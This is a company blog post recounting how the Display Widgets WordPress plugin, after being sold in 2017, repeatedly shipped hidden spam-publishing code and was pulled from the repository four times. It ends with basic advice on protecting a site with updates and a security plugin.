There are not a few people who are trying to take advantage of other websites in order to send out spam. Hiding malicious code inside their plugins, downloading extra “necessary” assets for the plugin to run and so on.
So is the case with Display Widgets a WordPress plugin that has more than 200.000 active installs, according to wordpress.org.

So, what did really happen?

On May 19 2017, after a long thread of negotiations the plugin has been sold to a man named Mason Soiza for the fair amount of $15.000. It is not clear if his pure intentions were to buy the plugin in order to use it as a backdoor to the 200.000 websites that were using it, but this is what happened. On June 22th a SEO consultant named David Law, informed the WordPress team that the plugin was downloading additional code from an external server. Such cases are not allowed for plugins on the WordPress repository, so the next day, June 23th the plugin was removed from the WordPress repository. On June 30, the second release of the plugin under the new ownership and the first to include the malicious coude was published on the WordPress repository. This code allowed the owner of the plugin, Soiza, to publish spam content to the infected websites. What’s best, the malicious content was entirely hidden for logged in users. This means that there was 99% chance that the website owners had no idea about what was happening on their website. It was David Law again who found that the plugin is logging visits to each website to an external server and reported it to the WordPress team. It is noteworthy that no one found the hidden malicious code yet. The plugin was removed from the repository for the second time. The plugin was been revisioned and reuploaded to the repository on July 6th with the malicious code still there and unnoticed. The logging code has been tweaked with an on/ off switch, which was off by default. More than two weeks later, on July 23rd, Calvin Ngan opened a Trac issue on WordPress.org reporting that Display Widgets was posting spam on his website. He found that the malicious code is in a file named geolocation.php. Once again, the plugin had been removed from the repository. The plugin has been uploaded again, on September 2nd with the malicious code still there. It has also been fixed since there was a minor bug in the malicious code! The plugin has been deleted from the repository on September 8th for the fourth time. Which could actually be considered a record! In the meantime, the original author of the plugin, posted on Twitter in order to warn people about the incident.

Users with a security plugin had been warned

WordPress admins who have WordFence installed on their website had been warned all four times the plugin in question was being deleted from the WordPress repository. That is because WordFence has a feature that informs the admins when a plugin they use has been removed from wordpress.org since most deletions happen due to security issues.

How to protect yourself

It is common sense that such a massive platform like WordPress, which covers a great piece in the websites pie chart, is a big target which leaves non tech-savvy admins like bloggers and hobby journalists exposed. Hundreds of websites are being hacked on a daily basis. What you can do to protect yourself is always keep WordPress up to date since the team is constantly fixing security issues. The best thing you can do is install and use a security plugin such as WordFence, that I mentioned earlier, which is one of the greatest security plugins for WordPress. If you want to learn more on this matter, the whole timeline and the background of the man who is behind all this, go on and read the bellow articles from the WordFence blog. Display Widgets Plugin Includes Malicious Code to Publish Spam on WP Sites The Man Behind Plugin Spam: Mason Soiza Have you been using this plugin? What do you think of this incident? Let me know in the comments bellow and don’t forget to share so that more people learn about this issue and take action!
Lefteris

Lefteris

Lefteris is a frontend developer. He spends most of his day writing code in react native for our mobile applications while drinking coffee and telling bad jokes that only he laughs to. He also feels weird writing about himself in third person.

We are a software house!

A place that we gather all together to build, test and ship software for high demanding clients.

Our headquarters

Ipirou 16
Drama, 66100
Greece

T: +30 2521 105247
T: +31 (0) 20 894 6313
E: [email protected]